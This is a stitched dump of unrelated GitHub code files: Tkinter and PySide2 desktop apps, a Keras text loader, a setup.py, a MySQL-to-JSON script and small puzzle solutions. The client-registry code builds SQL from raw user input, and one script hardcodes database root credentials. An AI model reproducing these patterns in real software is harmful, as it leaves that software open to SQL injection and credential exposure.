WHERE rowid = \"+self.cod+\" \", (self.cliente, self.telefone, self.cpf))\n self.conn.commit()\n self.desconecta_db()\n self.select_lista()\n self.limpa_tela()\n\n def buscar(self):\n self.conecta_db()\n self.l_cliente.delete(*self.l_cliente.get_children())\n self.cliente_entry.insert(END, '%')\n nome=self.cliente_entry.get()\n self.cursor.execute(\"SELECT rowid, * FROM clientes WHERE nome_do_cliente LIKE '%s' ORDER BY nome_do_cliente ASC\" % nome)\n buscanome=self.cursor.fetchall()\n for i in buscanome:\n self.l_cliente.insert(\"\", END, values=i)\n self.limpa_tela()\n self.desconecta_db()\n\nclass Application(funcs, relatorios):\n\n def __init__(self) -> None:\n self.root = root\n self.tela()\n self.frames_da_tela()\n self.widgets_frame_1()\n self.lista_frame2()\n self.select_lista()\n self.menus()\n root.mainloop()\n pass\n\n def tela(self):\n self.root.title(\"Cadastro de clientes\")\n self.root.configure(background='black')\n self.root.geometry('800x600')\n self.root.resizable(True,True)\n self.root.maxsize(width=1000, height=700)\n self.root.minsize(width=700, height=600)\n\n def frames_da_tela(self):\n self.frame_1 = Frame(self.root, bg=\"#B6B4E6\" ,bd=4, highlightbackground='gray',highlightthickness=2)\n self.frame_2 = Frame(self.root, bd=4, highlightbackground='gray',highlightthickness=2)\n self.frame_1.place(relx=0.02, rely=0.02, relwidth=0.96, relheight=0.46 )\n self.frame_2.place(relx=0.02, rely=0.50, relwidth=0.96, relheight=0.46 )\n \n def widgets_frame_1(self):\n\n self.bt_limpar = Button(self.frame_1, text= 'Limpar', bd= 6, fg='#003233', font= ('arial',10,'bold'), command= self.limpa_tela )\n self.bt_limpar.place(relx=0.2, rely=0.1, relwidth=0.1, relheight=0.15)\n\n self.bt_buscar = Button(self.frame_1, text= 'Buscar', bd= 6, fg='#003233', font= ('arial',10,'bold'), command=self.buscar)\n self.bt_buscar.place(relx=0.3, rely=0.1, relwidth=0.1, relheight=0.15)\n\n self.bt_inserir = Button(self.frame_1, text= 'Inserir', bd= 6, fg='#003233', font= ('arial',10,'bold'), command= self.add_clientes)\n self.bt_inserir.place(relx=0.6, rely=0.1, relwidth=0.1, relheight=0.15)\n\n self.bt_alterar = Button(self.frame_1, text= 'Alterar', bd= 6, fg='#003233', font= ('arial',10,'bold'), command= self.alterar)\n self.bt_alterar.place(relx=0.7, rely=0.1, relwidth=0.1, relheight=0.15)\n\n self.bt_apagar = Button(self.frame_1, text= 'Apagar', bd= 6, fg='#003233', font= ('arial',10,'bold'), command= self.deletar)\n self.bt_apagar.place(relx=0.8, rely=0.1, relwidth=0.1, relheight=0.15)\n\n self.lb_codigo=Label(self.frame_1, text= \"Código\", bg=\"#B6B4E6\", fg='#003233', font= ('arial',10,'bold'))\n self.lb_codigo.place(relx= 0.05 ,rely= 0.05)\n\n self.codigo_entry=Entry(self.frame_1, bd= 4)\n self.codigo_entry.place(relx=0.05 ,rely=0.15, relwidth= 0.1)\n\n self.lb_cliente=Label(self.frame_1, text= \"Nome\", bg=\"#B6B4E6\", fg='#003233', font= ('arial',10,'bold'))\n self.lb_cliente.place(relx= 0.05 ,rely= 0.25)\n\n self.cliente_entry=Entry(self.frame_1, bd= 4)\n self.cliente_entry.place(relx=0.05 ,rely=0.35,relwidth=0.25)\n\n self.lb_telefone=Label(self.frame_1, text= \"Telefone\", bg=\"#B6B4E6\", fg='#003233', font= ('arial',10,'bold'))\n self.lb_telefone.place(relx= 0.05 ,rely= 0.45)\n\n self.telefone_entry=Entry(self.frame_1, bd= 4)\n self.telefone_entry.place(relx=0.05 ,rely=0.55,relwidth=0.25)\n\n self.lb_cpf=Label(self.frame_1, text= \"CPF\", bg=\"#B6B4E6\", fg='#003233', font= ('arial',10,'bold'))\n self.lb_cpf.place(relx= 0.05 ,rely= 0.65)\n\n self.cpf_entry=Entry(self.frame_1, bd= 4)\n 
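# The deletar/alterar/buscar methods above splice user input directly into
# SQL ("... WHERE rowid = " + self.cod, LIKE '%s' % nome), which breaks on a
# stray quote and is injectable. sqlite3 accepts placeholders in all three
# positions; a minimal parameterized sketch of the same statements:
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE clientes(nome_do_cliente text, telefone text, cpf text)")
cur.execute("INSERT INTO clientes VALUES (?, ?, ?)", ("Ana", "555", "123"))
cur.execute("UPDATE clientes SET telefone = ? WHERE rowid = ?", ("556", 1))
cur.execute("SELECT rowid, * FROM clientes WHERE nome_do_cliente LIKE ?",
            ("An%",))
print(cur.fetchall())
cur.execute("DELETE FROM clientes WHERE rowid = ?", (1,))
conn.close()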
self.cpf_entry.place(relx=0.05 ,rely=0.75,relwidth=0.25)\n\n def lista_frame2(self):\n self.l_cliente= ttk.Treeview(self.frame_2, height=5, columns=(\"col1\",\"col2\",\"col3\",\"col4\"))\n style = ttk.Style()\n style.configure(\"Treeview.Heading\", font=(\"TkDefaultFont\", 9, \"bold\"))\n \n self.l_cliente.heading(\"#0\", text=\"\")\n self.l_cliente.heading(\"#1\", text=\"Código\")\n self.l_cliente.heading(\"#2\", text=\"Nome\")\n self.l_cliente.heading(\"#3\", text=\"Telefone\")\n self.l_cliente.heading(\"#4\", text=\"CPF\")\n\n self.l_cliente.column(\"#0\", width=1)\n self.l_cliente.column(\"#1\", width=50, anchor=\"center\")\n self.l_cliente.column(\"#2\", width=200, anchor=\"center\")\n self.l_cliente.column(\"#3\", width=125, anchor=\"center\")\n self.l_cliente.column(\"#4\", width=125, anchor=\"center\")\n\n self.l_cliente.place(relx=\"0.02\", rely=\"0.1\", relwidth=\"0.95\", relheight=\"0.85\")\n \n self.scrollLista=Scrollbar(self.frame_2, orient=\"vertical\")\n self.l_cliente.configure(yscroll=self.scrollLista.set)\n self.scrollLista.configure(command=self.l_cliente.yview)\n self.scrollLista.place(relx=\"0.96\", rely=\"0.1\", relwidth=\"0.02\", relheight=\"0.85\")\n self.l_cliente.bind(\"\", self.onDoubleClick)\n\n def menus(self):\n menubar= Menu(self.root)\n self.root.config(menu=menubar)\n filemenu=Menu(menubar)\n filemenu2=Menu(menubar)\n\n def quit(): \n self.root.destroy()\n\n menubar.add_cascade(label=\"Opções\", menu= filemenu)\n menubar.add_cascade(label=\"Relatórios\", menu= filemenu2)\n\n filemenu.add_command(label=\"Sair\", command=quit)\n filemenu.add_command(label=\"Limpa campos\", command=self.limpa_tela)\n\n filemenu2.add_command(label=\"Ficha do cliente\", command=self.geraRelatCliente)\n\n \nApplication()\n","repo_name":"leo-vilelela/Interfaces-com-Tkinter","sub_path":"CadastroDeClientes.py","file_name":"CadastroDeClientes.py","file_ext":"py","file_size_in_byte":9468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41924573064","text":"from base.base_data_loader import BaseDataLoader\n\nfrom keras.preprocessing.text import Tokenizer, text_to_word_sequence\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.utils.np_utils import to_categorical\n\nimport pandas as pd\nimport numpy as np\nimport json\n\nclass FunctionalityDataLoader(BaseDataLoader):\n def __init__(self, config):\n # load data\n super(FunctionalityDataLoader, self).__init__(config)\n \n\n\n def get_train_data(self):\n functionality_to_index = {'background':0, 'objective':1, 'method':2, 'result':3, 'other':4}\n abstract_sents = []\n functionality = []\n func_index = []\n\n # load data from jsonl\n # train_pubmed.jsonl\n # {\"abstract_id\": \"24562799\", \"sentences\": [\"Many pathogenic ...\", \"It was ...\"], \n # \"labels\": [\"background\", \"background\"], \n # \"confs\": [1, 1]}\n with open('./data/functionality/train_pubmed.jsonl') as f:\n for line in f:\n json_dict = json.loads(line)\n abstract_sents += json_dict['sentences']\n functionality += json_dict['labels']\n\n # transfer functionality to index\n for f in functionality:\n func_index.append(functionality_to_index[f])\n\n # 0-1 encoding of func index\n func_index = to_categorical(np.asarray(func_index))\n\n # traning tokenizor\n tokenizer = Tokenizer(num_words=self.config.data_loader.MAX_NB_WORDS)\n tokenizer.fit_on_texts(abstract_sents)\n # sequences = tokenizer.texts_to_sequences(abstract_sents)\n\n # token embedding matrix, [sentence_number, MAX_SENT_LENGTH]\n 
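# (Each row of the matrix built below is one sentence; entry [i, j] is the
# vocabulary index of the j-th word. Zero doubles as both padding — where a
# sentence is shorter than MAX_SENT_LENGTH — and out-of-vocabulary, for
# words outside the top MAX_NB_WORDS tokens.)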
data = np.zeros((len(abstract_sents), self.config.data_loader.MAX_SENT_LENGTH), dtype='int32')\n for i, sent in enumerate(abstract_sents):\n word_tokens = text_to_word_sequence(sent)\n j = 0 # the j th words in a sentence\n for _, word in enumerate(word_tokens):\n if word in tokenizer.word_index and j < self.config.data_loader.MAX_SENT_LENGTH and tokenizer.word_index[word] < self.config.data_loader.MAX_NB_WORDS:\n data[i, j] = tokenizer.word_index[word]\n j = j + 1\n\n self.word_index = tokenizer.word_index\n print('Total %s unique tokens.' % len(self.word_index))\n\n # data = pad_sequences(sequences, maxlen=self.config.data_loader.MAX_SENTS)\n print('Shape of data tensor:', data.shape)\n print('Shape of label tensor:', func_index.shape)\n\n self.X_train = data\n self.y_train = func_index\n self.X_test = data\n self.y_test = func_index\n\n # load glove matrix\n embeddings_index = {}\n f = open('./data/glove.6B.100d.txt')\n for line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n f.close()\n\n print('Load glove data.')\n # glove embedding matrix\n self.embedding_matrix = np.random.random((len(self.word_index) + 1, self.config.data_loader.EMBEDDING_DIM))\n for word, i in self.word_index.items():\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None:\n # words not found in embedding index will be all-zeros.\n self.embedding_matrix[i] = embedding_vector\n\n np.savetxt('./experiments/embedding_matrix_func_200.txt', self.embedding_matrix)\n\n return self.X_train, self.y_train, len(self.word_index), self.embedding_matrix\n","repo_name":"hxiaom/SFGAN","sub_path":"data_loader/functionality_data_loader.py","file_name":"functionality_data_loader.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37782825710","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom setuptools import setup\n\nimport codecs\n\ndef read(filename):\n return codecs.open(filename, encoding='utf-8').read()\n\n\nlong_description = '\\n\\n'.join([read('README'),\n read('AUTHORS'),\n read('CHANGES')])\n\n__doc__ = long_description\n\nsetup(name='lantz_qt',\n version='0.5.dev0',\n license='BSD',\n description='Instrumentation framework',\n long_description=long_description,\n keywords='measurement control instrumentation science',\n author='Hernan E. 
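# The GloVe step above, in miniature: parse "word v1 v2 ..." lines into a
# dict, then fill an (n_words + 1, dim) matrix, leaving randomly initialised
# rows for words with no pretrained vector. An in-memory stand-in replaces
# glove.6B.100d.txt so the sketch runs without the real file.
import io
import numpy as np

glove_txt = io.StringIO("the 0.1 0.2\ncat 0.3 0.4\n")
dim = 2
embeddings = {}
for line in glove_txt:
    parts = line.split()
    embeddings[parts[0]] = np.asarray(parts[1:], dtype="float32")

word_index = {"the": 1, "cat": 2, "zebra": 3}
matrix = np.random.random((len(word_index) + 1, dim))
for word, i in word_index.items():
    vec = embeddings.get(word)
    if vec is not None:
        matrix[i] = vec
print(matrix.round(2))                # row 3 ("zebra") stays random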
Grecco',\n author_email='hernan.grecco@gmail.com',\n url='https://github.com/lantzproject',\n install_requires=['lantz>=0.5.dev0',\n ],\n include_package_data=True,\n packages=['lantz_qt',\n 'lantz_qt.blocks',\n 'lantz_qt.utils'],\n zip_safe=False,\n platforms='any',\n entry_points={},\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: Microsoft :: Windows',\n 'Operating System :: POSIX',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Software Development :: Libraries'\n ],\n)\n","repo_name":"alemazzeo/lantz_qt","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"21872936552","text":"################################################################################\n##\n## BY: WANDERSON M.PIMENTA\n## PROJECT MADE WITH: Qt Designer and PySide2\n## V: 1.0.0\n##\n################################################################################\n\nimport sys\nimport platform\nfrom PySide2 import QtCore, QtGui, QtWidgets\nfrom PySide2.QtCore import (QCoreApplication, QPropertyAnimation, QDate, QDateTime, QMetaObject, QObject, QPoint, QRect, QSize, QTime, QUrl, Qt, QEvent)\nfrom PySide2.QtGui import (QBrush, QColor, QConicalGradient, QCursor, QFont, QFontDatabase, QIcon, QKeySequence, QLinearGradient, QPalette, QPainter, QPixmap, QRadialGradient)\nfrom PySide2.QtWidgets import *\n# GUI FILE\nfrom ui_main import Ui_MainWindow\n# IMPORT FUNCTIONS\nfrom ui_functions import *\nfrom random import shuffle\n# from frmStart import *\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nnumwords=0\n\nclass MainWindow(QMainWindow):\n # List lưu trữ 5 từ vựng mỗi Box\n lstPracticeBox1=[]\n lstPracticeBox2=[]\n lstPracticeBox3=[]\n lstPracticeBox4=[]\n lstPracticeBox5=[]\n \n def loadVocabulary(self):\n global numwords\n Date_Now = date.today()\n Date_Old = findMaxDate()\n length=numwords\n print(\"Num\",numwords)\n print(Date_Now)\n print(Date_Old)\n if Date_Now > Date_Old: \n #Cập nhật lại những từ trả lời đúng của ngày trước\n # Nếu trả lời đúng thì sẽ tăng thêm 1 level\n # Ví dụ từ ở Box1 trả lời đúng thì từ đó sẽ được đưa lên Box 2\n updateBox(Date_Old)\n lstBox1 = find_by_level_box(1)\n print(lstBox1)\n \n shuffle(lstBox1)\n if len(lstBox1) > 30: \n length=numwords+len(lstBox1)//10\n lstPracticeBox1=lstBox1[0:length]\n ############################\n lstBox2 = find_by_level_box(2)\n shuffle(lstBox2)\n if len(lstBox2) > 30: \n length=numwords+len(lstBox1)//10 \n lstPracticeBox2=lstBox2[0:length]\n #############################\n lstBox3 = find_by_level_box(3)\n shuffle(lstBox3)\n if len(lstBox3) > 30: \n length=numwords+len(lstBox1)//10\n lstPracticeBox3=lstBox3[0:length]\n #############################\n lstBox4 = find_by_level_box(4)\n shuffle(lstBox4)\n if len(lstBox4) > 30: \n length=numwords+len(lstBox1)//10\n lstPracticeBox4=lstBox4[0:length]\n #############################\n lstBox5 = find_by_level_box(5)\n shuffle(lstBox5)\n if len(lstBox5) > 30: \n length=numwords+len(lstBox1)//10\n lstPracticeBox5=lstBox5[0:length]\n #############################\n #insert vào mỗi Box 5 từ \n for item in lstPracticeBox1:\n addReview(item[0])\n for item in lstPracticeBox2:\n addReview(item[0])\n for item in 
lstPracticeBox3:\n addReview(item[0])\n for item in lstPracticeBox4:\n addReview(item[0])\n for item in lstPracticeBox5:\n addReview(item[0])\n\n\n def __init__(self):\n QMainWindow.__init__(self)\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.loadVocabulary()\n ## TOGGLE/BURGUER MENU\n ########################################################################\n # self.ui.Btn_Toggle.clicked.connect(lambda: UIFunctions.toggleMenu(self, 250, True))\n\n ## PAGES\n ########################################################################\n\n # PAGE 1\n #Box Source\n self.ui.btn_page_1.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_1))\n self.ui.btn_page_1.clicked.connect(lambda:UIFunctions.assignLevel(self,0))\n # Box 1\n self.ui.btn_page_2.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btn_page_2.clicked.connect(lambda:UIFunctions.mapping(self,1))\n # Box 2\n self.ui.btn_page_3.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btn_page_3.clicked.connect(lambda:UIFunctions.mapping(self,2))\n # Box 3\n self.ui.btn_page_4.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btn_page_4.clicked.connect(lambda:UIFunctions.mapping(self,3))\n # Box 4\n self.ui.btn_page_5.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btn_page_5.clicked.connect(lambda:UIFunctions.mapping(self,4))\n # Box 5\n self.ui.btn_page_6.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btn_page_6.clicked.connect(lambda:UIFunctions.mapping(self,5))\n # Box Done\n self.ui.btn_page_7.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btn_page_7.clicked.connect(lambda:UIFunctions.mapping(self,6))\n # Box Custom\n self.ui.btnCustom.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btnCustom.clicked.connect(lambda:UIFunctions.mapping(self,-1))\n # Box Recruitment\n self.ui.btnRecruitment.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btnRecruitment.clicked.connect(lambda:UIFunctions.mapping(self,-2))\n # Box Workplace\n self.ui.btnWorkplace.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btnWorkplace.clicked.connect(lambda:UIFunctions.mapping(self,-3))\n # Box Bussiness\n self.ui.btnBussiness.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btnBussiness.clicked.connect(lambda:UIFunctions.mapping(self,-4))\n # Box Shopping\n self.ui.btnShopping.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btnShopping.clicked.connect(lambda:UIFunctions.mapping(self,-5))\n # Box Travel\n self.ui.btnTravel.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btnTravel.clicked.connect(lambda:UIFunctions.mapping(self,-6))\n\n #Edit or Save\n self.ui.btn_edit.clicked.connect(lambda:UIFunctions.edit_Vocabulary(self))\n #Delete\n self.ui.btn_delete.clicked.connect(lambda:UIFunctions.delete_Vocabulary(self))\n #Practice\n #self.ui.btn_practice.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.frmPractice))\n self.ui.btn_practice.clicked.connect(lambda: UIFunctions.findListPractice(self))\n #Submit\n self.ui.btnSubmit.clicked.connect(lambda: UIFunctions.isCorrect(self,self.ui.lstPractice[0][1]))\n #Micro\n 
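# loadVocabulary() above is a Leitner-style spaced-repetition queue: once
# per day it promotes yesterday's correctly answered words one box up (box 1
# to box 2, and so on), then draws a shuffled slice from each of the five
# boxes — slightly more words when a box holds over 30 — into today's review
# list. A data-only sketch of that promotion/sampling rule, with a
# hypothetical plain-dict store standing in for the app's SQLite tables:
import random

boxes = {1: ["cat", "dog", "sun"], 2: ["river"], 3: [], 4: [], 5: []}

def promote(word, box):
    if box < 5 and word in boxes[box]:
        boxes[box].remove(word)
        boxes[box + 1].append(word)

def daily_sample(base=3):
    today = []
    for level, words in boxes.items():
        pool = words[:]
        random.shuffle(pool)
        extra = len(pool) // 10 if len(pool) > 30 else 0
        today.extend(pool[:base + extra])
    return today

promote("cat", 1)
print(boxes, daily_sample())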
self.ui.btnMic.clicked.connect(lambda: UIFunctions.listenning(self))\n #Review \n self.ui.btn_review.clicked.connect(lambda: UIFunctions.reviewVocabulary(self))\n #Cancel ở form Practice\n self.ui.btnCancel.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btnCancel.clicked.connect(lambda:UIFunctions.mapping(self,self.ui.level))\n #Đọc từ vựng ở trong ô text\n self.ui.btnSpeak.clicked.connect(lambda: UIFunctions.speaking(self))\n\n #Quit để thoát ứng dụng\n \n self.ui.btnQuit.clicked.connect( lambda:UIFunctions.message_box(self))\n\n #Result để xem biểu đồ thống kê kết quả học tập\n self.ui.btnResult.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_3))\n self.ui.btnResult.clicked.connect(lambda:UIFunctions.assignLevel(self,7))\n # self.ui.btnResult.clicked.connect( lambda:drawGraph())\n # Xem thống kê tình hình học tập từ ngày A đến ngày B\n self.ui.btnShowResultByDay.clicked.connect(lambda: drawGraph(self.ui.dateFrom.date(),self.ui.dateTo.date()))\n # Xem thống kê tình hình học tập trong tháng\n self.ui.btnShowResultByMonth.clicked.connect(lambda: drawGraph(self.ui.dateMonth.date(),QDate(self.ui.dateMonth.date().year(),self.ui.dateMonth.date().month(),numberOfDays(self.ui.dateMonth.date().year(),self.ui.dateMonth.date().month()))))\n # Xuất ra excel tình hình học tập từ ngày A đến ngày B\n self.ui.btnExportResultByDay.clicked.connect(lambda: exportToExcel(self.ui.dateFrom.date(),self.ui.dateTo.date()))\n # Xem thống kê tình hình học tập trong tháng\n self.ui.btnExportResultByMonth.clicked.connect(lambda: exportToExcel(self.ui.dateMonth.date(),QDate(self.ui.dateMonth.date().year(),self.ui.dateMonth.date().month(),numberOfDays(self.ui.dateMonth.date().year(),self.ui.dateMonth.date().month()))))\n\n \n # Khi nhấn vào table vocabylary thì sẽ binding dữ liệu sang form\n self.ui.tlwBoxWord.clicked.connect(lambda:UIFunctions.displayDetailVocabulary(self))\n # Khi nhấn vào button chọn hình ảnh\n self.ui.btn_image.clicked.connect(lambda:UIFunctions.loadImage(self))\n # Khi nhấn vào nút Cancel để huỷ thao tác Edit hoặc Add từ vựng\n self.ui.btn_cancel.clicked.connect(lambda:UIFunctions.cancelEditOrAdd(self))\n # Đổi tên Box theo số từ còn lại ở trong Box\n for i in range(1,6):\n UIFunctions.renameBox(self,i)\n ## SHOW ==> MAIN WINDOW\n ########################################################################\n \n self.show()\n ## ==> END ##\nclass Ui_Form(object):\n def setupUi(self, Form):\n \n def easyLevel():\n print(1)\n global numwords\n numwords = 3\n Form.setHidden(True)\n MainWindow()\n def mediumLevel():\n global numwords\n print(2)\n numwords = 5\n Form.setHidden(True)\n MainWindow()\n def hardLevel():\n print(3)\n global numwords\n numwords = 10\n Form.setHidden(True)\n MainWindow()\n Form.setObjectName(\"Form\")\n Form.resize(403, 505)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(Form.sizePolicy().hasHeightForWidth())\n Form.setSizePolicy(sizePolicy)\n Form.setAutoFillBackground(False)\n Form.setStyleSheet(\"background:rgb(2, 14, 30) \")\n self.btnEasy = QtWidgets.QPushButton(Form)\n self.btnEasy.setGeometry(QtCore.QRect(20, 20, 361, 131))\n self.btnEasy.clicked.connect(easyLevel)\n font = QtGui.QFont()\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.btnEasy.setFont(font)\n self.btnEasy.setStyleSheet(\"background:rgb(85, 170, 255);\\n\"\n 
\"color:rgb(255, 255, 255)\")\n self.btnEasy.setObjectName(\"btnEasy\")\n self.btnMedium = QtWidgets.QPushButton(Form)\n self.btnMedium.setGeometry(QtCore.QRect(20, 160, 361, 131))\n font = QtGui.QFont()\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.btnMedium.setFont(font)\n self.btnMedium.setStyleSheet(\"background:rgb(85, 170, 255);\\n\"\n \"color:rgb(255, 255, 255)\")\n self.btnMedium.setObjectName(\"btnMedium\")\n self.btnHard = QtWidgets.QPushButton(Form)\n self.btnMedium.clicked.connect(mediumLevel)\n self.btnHard.setGeometry(QtCore.QRect(20, 300, 361, 131))\n font = QtGui.QFont()\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.btnHard.setFont(font)\n self.btnHard.setStyleSheet(\"background:rgb(85, 170, 255);\\n\"\n \"color:rgb(255, 255, 255)\")\n self.btnHard.setObjectName(\"btnHard\")\n self.label = QtWidgets.QLabel(Form)\n self.btnHard.clicked.connect(hardLevel)\n self.label.setGeometry(QtCore.QRect(30, 450, 341, 31))\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())\n self.label.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(14)\n self.label.setFont(font)\n self.label.setStyleSheet(\"color:rgb(255, 255, 255)\")\n self.label.setObjectName(\"label\")\n\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n \n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"Form\", \"Form\"))\n self.btnEasy.setText(_translate(\"Form\", \"Easy\"))\n self.btnMedium.setText(_translate(\"Form\", \"Medium\"))\n self.btnHard.setText(_translate(\"Form\", \"Hard\"))\n self.label.setText(_translate(\"Form\", \"Vui lòng chọn độ khó để tiếp tục.\"))\n\nif __name__ == \"__main__\":\n Date_Now = date.today()\n Date_Old = findMaxDate()\n app = QApplication(sys.argv)\n\n print(Date_Now)\n print(Date_Old)\n if Date_Now > Date_Old:\n Form = QtWidgets.QWidget()\n ui = Ui_Form()\n ui.setupUi(Form)\n Form.show()\n else:\n MainWindow()\n sys.exit(app.exec_()) \n","repo_name":"nghiabv120100/PracticeDaily","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74654869172","text":"import json\nimport pymysql\nimport urllib.parse\nimport requests\nimport json\ndb = pymysql.Connect(\n host = 'localhost',\n port = 3306,\n user = 'root',\n password = 'root',\n db = 'qunar',\n charset = 'utf8'\n)\ncur = db.cursor()\nsql = 'select a.sale,lat,lng from ((select address,sale from qunar_new) a left join (select title,lat,lng from address) b on a.address = b.title) where lat != \\\"\\\"'\ncur.execute(sql)\nres = cur.fetchall()\npoints = []\nfor item in res:\n points.append({\"lng\":item[2],\"lat\":item[1],\"count\":item[0]})\nstr=json.dumps(points)\nprint(str)\nwith open('C:\\\\Users\\\\admin\\\\Desktop\\\\data.txt','w') as f: #设置文件对象\n f.write(str)\n f.close()","repo_name":"LATHX/crawler","sub_path":"travle/extract_json.py","file_name":"extract_json.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45170978131","text":"# https://adventofcode.com/2020/day/11\n\nimport os\nfrom pprint import pprint\n\nimport copy\n\nSCRIPT_DIR = 
os.path.dirname(__file__)\nINPUT_FILENAME = 'inputs.txt'\nSAMPLE_INPUTS_FILENAME = 'inputs_sample.txt'\n\n\ndef get_inputs(filename=INPUT_FILENAME):\n filepath = os.path.join(SCRIPT_DIR, filename)\n inputs = []\n\n with open(filepath, 'r') as f:\n inputs = f.read().splitlines()\n\n return inputs\n\n\ndef do_seats(rows):\n new_rows = copy.deepcopy(rows)\n new_num_occupied = 0\n\n for y, cols in enumerate(rows):\n for x, col in enumerate(cols):\n if col == '.':\n continue\n\n num_occupied = 0\n for dy in range(-1, 2):\n for dx in range(-1, 2):\n ax = x + dx\n ay = y + dy\n\n if x == ax and y == ay:\n continue\n\n if ay < 0 or ay >= len(rows):\n continue\n\n if ax < 0 or ax >= len(cols):\n continue\n\n if rows[ay][ax] == '#':\n num_occupied += 1\n\n if col == 'L' and num_occupied == 0:\n new_rows[y][x] = '#'\n\n elif col == '#' and num_occupied >= 4:\n new_rows[y][x] = 'L'\n\n if new_rows[y][x] == '#':\n new_num_occupied += 1\n\n return new_rows, new_num_occupied\n\ndef process(inputs):\n seats = []\n for row in inputs:\n seats.append(list(row))\n\n prev_occupied = -1\n num_occupied = 0\n\n while True:\n prev_occupied = num_occupied\n seats, num_occupied = do_seats(seats)\n\n if num_occupied == prev_occupied:\n break\n\n return num_occupied\n\n\ntest_inputs = get_inputs(filename=SAMPLE_INPUTS_FILENAME)\ntest_answer = process(test_inputs)\nprint(f'test answer:', test_answer)\nassert test_answer == 37\n\ninputs = get_inputs(filename=INPUT_FILENAME)\nanswer = process(inputs)\nprint(f'answer:', answer)\nassert answer == 2183\n","repo_name":"thalida/adventofcode","sub_path":"2020/day-11/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12256832151","text":"class Solution:\n def smallestK(self, arr, k):\n if not arr or not k:\n return []\n\n def heapify(arr, i, n):\n left = 2 * i + 1\n right = 2 * i + 2\n\n minNum = i\n if left < n and arr[minNum] > arr[left]:\n minNum = left\n if right < n and arr[minNum] > arr[right]:\n minNum = right\n\n if minNum != i:\n arr[i], arr[minNum] = arr[minNum], arr[i]\n heapify(arr, minNum, n)\n\n def heapSort(arr):\n n = len(arr)\n tmp = []\n for i in range(n // 2 - 1, -1, -1):\n heapify(arr, i, n)\n\n for i in range(n - 1, -1, -1):\n arr[i], arr[0] = arr[0], arr[i]\n tmp.append(arr[i])\n if len(tmp) == k:\n return tmp\n heapify(arr, 0, i)\n\n return heapSort(arr)\n\n\nif __name__ == '__main__':\n s = Solution()\n arr = [1, 3, 5, 7, 2, 4, 6, 8]\n k = 4\n ans = s.smallestK(arr, k)\n print(ans)\n","repo_name":"PlutoaCharon/CodeExercise_Python","sub_path":"LeetCode/面试题 17.14. 最小K个数.py","file_name":"面试题 17.14. 
